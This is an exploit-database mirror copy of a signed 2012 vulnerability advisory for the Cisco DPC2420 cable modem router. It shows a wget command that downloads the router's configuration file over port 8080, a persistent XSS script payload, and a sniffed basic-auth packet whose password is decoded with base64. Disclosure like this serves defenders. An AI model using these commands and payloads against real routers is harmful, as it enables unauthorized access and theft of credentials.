bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/23250.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

140 lines
No EOL
5.6 KiB
Text
Raw Permalink Blame History

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
##
## -> Title: DPC2420 Multiple vulnerabilities
## -> Author: Facundo M. de la Cruz (tty0)
## -> E-mail: fmdlc@code4life.com.ar
##=20
[0x00]> Details
Vendor : Cisco
Model : DPC2420
type : Cablemodem router.=20
Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin
Software: D2425-P10-13-v202r12811-110511as-TRO
Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html
[0x01]> Configuration file disclosure
Some ISP's (like the Argentinean Telecentro) could make some changes in the=
router configration via the=20
TCP 8080 port.
If the remote config option is enabled and the port is not filter, an attac=
ker can download this file=20
calling the correct URL. For example:
$ wget http://foobar:8080/filename.gwc -O filename.gwc=20
- --2012-12-08 21:24:43-- http://foobar:8080/filename.gwc
Connecting to foobar:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
nary]
Saving to: =E2=80=9Cfilename.gwc=E2=80=9D
[ <=> ] 15,=
927 50.9K/s in 0.3s =20
2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
27]
$ head -n 10 filename.gwc=20
CRCVALUE=4144540802;
#<<Begin of Configuration File>>
Version=1.1;
Created Date=2012/12/8;
Created Time=21:24:43;
Model Number=DPC2420;
Serial Number=234905123;
User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;
[---OUTPUT OMITTED FOR SPACE REASONS---]
[0x02]> - Persistent XSS
With a valid user in the router web interface for managment and configurati=
on, a user could insert JavaScript
code in this forms and make a XSS, for example add a parental rule called "=
'/><script>alert(1)</script>.
http://192.168.0.1/RgParentalBasic.asp
- -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png
[0x03]> Authtype Basic=20
An attacker making an ARP poisoning attack could get the router loggin cred=
entials due the web interface=20
authentication type is auth-basic.=20
Then the attacker could get the Base64 encoded password and convert it to p=
lain text easily.=20
20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0=
:372, ack 1, win 115
0x0000: 4500 01a8 fdf4 4000 4006 ccaf ac10 01f2 E.....@.@.......
0x0010: c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e .......P....v...
0x0020: 8018 0073 03c2 0000 0101 080a 055f ee19 ...s........._..
0x0030: 0000 be7e 4745 5420 2f73 6967 6e61 6c2e ...~GET./signal.
0x0040: 6173 7020 4854 5450 2f31 2e31 0d0a 486f asp.HTTP/1.1..Ho
0x0050: 7374 3a20 3139 322e 3136 382e 302e 310d st:.192.168.0.1.
0x0060: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz
0x0070: 696c 6c61 2f35 2e30 2028 5831 313b 204c illa/5.0.(X11;.L
0x0080: 696e 7578 2078 3836 5f36 343b 2072 763a inux.x86_64;.rv:
0x0090: 3136 2e30 2920 4765 636b 6f2f 3230 3130 16.0).Gecko/2010
0x00a0: 3031 3031 2046 6972 6566 6f78 2f31 362e 0101.Firefox/16.
0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/
0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application
0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.=
9
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acc=
e
0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Ac=
c
0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz
0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con
0x0140: 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al
0x0150: 6976 650d 0a52 6566 6572 6572 3a20 6874 ive..Referer:.ht
0x0160: 7470 3a2f 2f31 3932 2e31 3638 2e30 2e31 tp://192.168.0.1
0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A
0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba
0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3
0x01a0: 1b4e 1134 640a 054b ZAo==....
- From 0x0180 offset to the end of the packet payload the attacker could ge=
t the password=20
encoded with Base64 and simply convert it to plain text:
$ echo aWFtYXBhc3N3ZAo== | base64 -d
iamapassword
- ---
1355011796
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iQIcBAEBAgAGBQJQxAalAAoJENeXyOFXJgeJY5cP/2/1n/KGlXcyGLPbbzOa2517
EW4UXl4apvKWWOfRfem7+zA/Y4Epxw2l3153Dbp52u2FWPSHzzI3ETK3zY8EYGjL
JkBixPSURV8wPwl33XlM/i0dYbtgVspYEgbtFF/ox1mHe4yPapageu3W0rQvf1fX
IcmS7gS7os65ch9nLH5CpqJBcpxw+n131iI8g5yJ8rmGmkjre8cIwsvG4tNfyZGo
X96pgTzjYnLQww1UoGSkhhKEAudCwb6gqsuGNSbal/Sg1KXj3vmqeZlxWrDEGcuV
fbyGYrn5/+mlayzZLChPSoZrET6qKr78PEPGz5sp0d4mRVz6txr0tpnmmY7aIKL0
HlwhlN6nCbzmuq1RrBL+1FHMAP0Xi7JN6WH5AuDW75r5QO8CyYxIm8TlqXMScJYH
bhX2CmfqkYpKsx3bbxDlqn5cCLUUdEm7UM/TuLcvzzAiyamBQgsrNCI6TOXClFRB
zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9
s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq
X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G
E7C4vqJfmBNShPTbtb67
=Ezto
-----END PGP SIGNATURE-----
Reference in a new issue View git blame Copy permalink